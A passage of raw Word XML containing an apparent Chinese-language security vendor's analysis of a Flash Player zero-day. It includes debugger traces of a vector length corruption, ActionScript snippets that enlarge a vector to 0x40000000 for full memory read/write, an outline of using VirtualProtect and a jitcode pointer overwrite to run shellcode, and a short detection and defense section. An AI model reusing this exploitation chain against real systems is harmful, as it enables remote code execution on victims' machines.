        <w:t>eip=0778dd7e esp=038fe5a4 ebp=09957850 iopl=0         nv up ei pl zr na pe nc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00040246</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>Flash32_18_0_0_203!DllUnregisterServer+0x7489c:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>0778dd7e 889e20030000    mov     byte ptr [esi+320h],bl     ds:0023:0995cb30=00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>0:008&gt; g</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>Breakpoint 6 hit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>eax=00000000 ebx=0000006a ecx=09957708 edx=00000006 esi=0995c418 edi=09951d78</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>eip=0778dd7e esp=038fe82c ebp=09957708 iopl=0         nv up ei pl zr na pe nc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00040246</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>Flash32_18_0_0_203!DllUnregisterServer+0x7489c:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>0778dd7e 889e20030000    mov     byte ptr [esi+320h],bl     ds:0023:0995c738=00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>0:008&gt; g</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>Breakpoint 6 hit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>eax=00000000 ebx=0000006a ecx=09957708 edx=00000006 esi=0995c418 edi=09951d78</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>eip=0778dd7e esp=038fe82c ebp=09957708 iopl=0         nv up ei pl zr na pe nc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00040246</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>Flash32_18_0_0_203!DllUnregisterServer+0x7489c:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>0778dd7e 889e20030000    mov     byte ptr [esi+320h],bl     ds:0023:0995c738=00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>0:008&gt; g</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>Breakpoint 6 hit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>eax=00000000 ebx=00000</w:t>
      </w:r>
      <w:r w:rsidRPr="00205D4E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>06a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ecx=099575c0 edx=00000006 esi=0995c020 edi=09951ca0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>eip=0778dd7e esp=038feab4 ebp=099575c0 iopl=0         nv up ei pl zr na pe nc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00040246</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>Flash32_18_0_0_203!DllUnregisterServer+0x7489c:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r w:rsidRPr="00D25969">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0778dd7e 889e20030000    mov     byte ptr [esi+320h],bl     ds:0023:0995c340=62</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D25969" w:rsidRDefault="00D25969" w:rsidP="0075603E"/>
    <w:p w:rsidR="00D25969" w:rsidRDefault="00CF6466" w:rsidP="0075603E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>刚好</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x320 offset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处为下一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vector&lt;uint&gt;(0x62)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长度字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007057EB" w:rsidRDefault="007057EB" w:rsidP="0075603E">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00D25969" w:rsidRDefault="00D25969" w:rsidP="00D25969">
      <w:r>
        <w:t>0:008&gt; dd 0995c340</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  //vector&lt;uint&gt;(0x62) mbuffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D25969" w:rsidRDefault="00D25969" w:rsidP="00D25969">
      <w:r>
        <w:t xml:space="preserve">0995c340  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D25969">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">00000062 </w:t>
      </w:r>
      <w:r>
        <w:t>08d42000 00000039 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D25969" w:rsidRDefault="00D25969" w:rsidP="00D25969">
      <w:r>
        <w:t>0995c350  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D25969" w:rsidRDefault="00D25969" w:rsidP="00D25969">
      <w:r>
        <w:t>0995c360  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D25969" w:rsidRDefault="00D25969" w:rsidP="00D25969">
      <w:r>
        <w:t>0995c370  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D25969" w:rsidRDefault="00D25969" w:rsidP="00D25969">
      <w:r>
        <w:t>0995c380  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D25969" w:rsidRDefault="00D25969" w:rsidP="00D25969">
      <w:r>
        <w:t>0995c390  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D25969" w:rsidRDefault="00D25969" w:rsidP="00D25969">
      <w:r>
        <w:t>0995c3a0  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D25969" w:rsidRDefault="00D25969" w:rsidP="00D25969">
      <w:r>
        <w:t>0995c3b0  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205D4E" w:rsidRDefault="00205D4E" w:rsidP="00D25969">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行之后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vector&lt;uint&gt;(0x62)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>长度被修改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x6a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205D4E" w:rsidRDefault="00205D4E" w:rsidP="00D25969"/>
    <w:p w:rsidR="0070605C" w:rsidRDefault="004F7783" w:rsidP="004F7783">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5 F</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7783">
        <w:t>ind corrupted vector length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F7783" w:rsidRDefault="004F7783" w:rsidP="004F7783"/>
    <w:p w:rsidR="006B2963" w:rsidRDefault="006B2963" w:rsidP="006B2963">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>for(i=_arLen2; i &lt; _arLen; i++) {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_vu = _ar[i];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if (_vu.length &gt; _vLen+2) {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Log("ar["+i+"].length = " + Hex(_vu.length));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Log("ar["+i+"]["+Hex(_vLen)+"] = " + Hex(_vu[_vLen]));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_vu[_vLen] == _vLen) {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corrupt next vector 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E30">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>_vu[_vLen] = LEN40;</w:t>
      </w:r>
      <w:r w:rsidR="00E33C77" w:rsidRPr="00F15E30">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>//0x40000000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get corrupted vector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vu = _ar[_vu[_vLen+2]]; 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B296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</w:r>
      <w:r>
        <w:tab/>
        <w:t>};// else CheckCorrupted(_vu, i); // 4RnD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F7783" w:rsidRDefault="006B2963" w:rsidP="006B2963">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B2963" w:rsidRDefault="006B2963" w:rsidP="006B2963"/>
    <w:p w:rsidR="00B8606B" w:rsidRDefault="00E33C77" w:rsidP="006B2963">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于某一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vector&lt;uint&gt;(0x62)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的长度被改成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0x6a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里循环进行寻找，找到之后</w:t>
      </w:r>
      <w:r w:rsidR="005E3D9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被修改的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进而修改后面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>长度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15E30" w:rsidRDefault="00F15E30" w:rsidP="006B2963"/>
    <w:p w:rsidR="00F15E30" w:rsidRDefault="005D1B10" w:rsidP="006B2963">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>_vu = _ar[_vu[_vLen+2]];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于之前通过设置</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1B10">
        <w:t>_ar[i][0] = i;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C3FB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标记了是哪个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vector&lt;uint&gt;()</w:t>
      </w:r>
      <w:r w:rsidR="004C3FB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C3FB9" w:rsidRDefault="004C3FB9" w:rsidP="006B2963"/>
    <w:p w:rsidR="00E81EF7" w:rsidRDefault="00E81EF7" w:rsidP="00E81EF7">
      <w:r>
        <w:t>0:008&gt; dd 0995c340  +0x62*4+8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E81EF7" w:rsidRDefault="00E81EF7" w:rsidP="00E81EF7">
      <w:r>
        <w:t xml:space="preserve">0995c4d0  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E81EF7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>40000000</w:t>
      </w:r>
      <w:r w:rsidRPr="00E81EF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>08d42000 0000003a 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E81EF7" w:rsidRDefault="00E81EF7" w:rsidP="00E81EF7">
      <w:r>
        <w:t>0995c4e0  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E81EF7" w:rsidRDefault="00E81EF7" w:rsidP="00E81EF7">
      <w:r>
        <w:t>0995c4f0  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E81EF7" w:rsidRDefault="00E81EF7" w:rsidP="00E81EF7">
      <w:r>
        <w:t>0995c500  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E81EF7" w:rsidRDefault="00E81EF7" w:rsidP="00E81EF7">
      <w:r>
        <w:t>0995c510  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E81EF7" w:rsidRDefault="00E81EF7" w:rsidP="00E81EF7">
      <w:r>
        <w:t>0995c520  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E81EF7" w:rsidRDefault="00E81EF7" w:rsidP="00E81EF7">
      <w:r>
        <w:t>0995c530  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C3FB9" w:rsidRDefault="00E81EF7" w:rsidP="00E81EF7">
      <w:r>
        <w:t>0995c540  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E81EF7" w:rsidRDefault="00E81EF7" w:rsidP="00E81EF7"/>
    <w:p w:rsidR="00E81EF7" w:rsidRDefault="0099205E" w:rsidP="0099205E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099205E" w:rsidRDefault="0099205E" w:rsidP="0099205E"/>
    <w:p w:rsidR="0099205E" w:rsidRDefault="0099205E" w:rsidP="0099205E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时拥有了一个可以长度为全内存的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">vector </w:t>
      </w:r>
      <w:r w:rsidRPr="0099205E">
        <w:t>_vu</w:t>
      </w:r>
      <w:r w:rsidR="00A17B4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，为了最终能实现全内存读写需要成</w:t>
      </w:r>
      <w:r w:rsidR="00A17B4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A17B4E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>步</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099205E" w:rsidRDefault="0099205E" w:rsidP="0099205E"/>
    <w:p w:rsidR="00A17B4E" w:rsidRDefault="00A17B4E" w:rsidP="00D56920">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="00D56920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了能读写全内存，此时需要获取到</w:t>
      </w:r>
      <w:r w:rsidR="00D56920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">_vul[0] </w:t>
      </w:r>
      <w:r w:rsidR="00D56920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数组的首地址，之后读写任意地址只需和首地址相计算得出</w:t>
      </w:r>
      <w:r w:rsidR="00D56920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>INDEX</w:t>
      </w:r>
      <w:r w:rsidR="00D56920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，通过</w:t>
      </w:r>
      <w:r w:rsidR="00D56920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">_vul[index] </w:t>
      </w:r>
      <w:r w:rsidR="00D56920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可读写全内存。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003066E8" w:rsidRDefault="003066E8" w:rsidP="00D56920">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0037733B" w:rsidRDefault="00A17B4E" w:rsidP="00D56920">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时还需要获取到一个定义的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首地址，这样以后任意对象的地址可以通过</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A17B4E" w:rsidRDefault="00A17B4E" w:rsidP="00A17B4E">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A17B4E">
        <w:t>_vo[1] = obj;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后获取</w:t>
      </w:r>
      <w:r w:rsidR="00753855">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用代码里面的</w:t>
      </w:r>
      <w:r w:rsidRPr="0037733B">
        <w:t>Prepare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数主要做此工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F0E47" w:rsidRDefault="009F0E47" w:rsidP="00A17B4E">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D56920" w:rsidRDefault="00875FC8" w:rsidP="00D56920">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后通过搜索内存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取到关键</w:t>
      </w:r>
      <w:r w:rsidR="00F73A06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VirtualProtect</w:t>
      </w:r>
      <w:r w:rsidR="00F73A06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数地址，触发调用设置</w:t>
      </w:r>
      <w:r w:rsidR="00F73A06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r w:rsidR="00F73A06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可执行属性，最后</w:t>
      </w:r>
      <w:r w:rsidR="00F7303B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过篡改</w:t>
      </w:r>
      <w:r w:rsidR="00F7303B" w:rsidRPr="00F7303B">
        <w:t>Payload</w:t>
      </w:r>
      <w:r w:rsidR="00F7303B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00F7303B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jitcode</w:t>
      </w:r>
      <w:r w:rsidR="00F7303B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指针，</w:t>
      </w:r>
      <w:r w:rsidR="00F73A06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidR="00F73A06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r w:rsidR="001D1AE5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，读者可以在自己调试一番。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F73A06" w:rsidRDefault="00F73A06" w:rsidP="00D56920">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D56920" w:rsidRDefault="00BF219C" w:rsidP="00BF219C">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF219C">
        <w:t>Detection and Defense</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF219C" w:rsidRDefault="00CE6934" w:rsidP="00BF219C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们的未知威胁检测引擎无需更新即可检测到此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0day,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>详情请查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>超</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE6934" w:rsidRDefault="007057EB" w:rsidP="00BF219C">
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00CE6934" w:rsidRPr="00236AE1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://b-chao.com/index.php/Index/show_detail/Sha1/E695FBEB87CB4F02917E574DABB5EC32D1D8F787</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CE6934" w:rsidRDefault="00CE6934" w:rsidP="00BF219C"/>
    <w:p w:rsidR="007959E3" w:rsidRDefault="00E51DD0" w:rsidP="00BF219C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以预见很快各大</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit kit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将会增加此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0day</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的支持并进行挂马、钓鱼攻击，用户可以暂时先禁用掉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Flash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Adobe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方发布更新补丁</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E51DD0" w:rsidRPr="00E51DD0" w:rsidRDefault="00E51DD0" w:rsidP="00BF219C"/>
    <w:p w:rsidR="00AB561A" w:rsidRDefault="004136AC" w:rsidP="00AB561A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
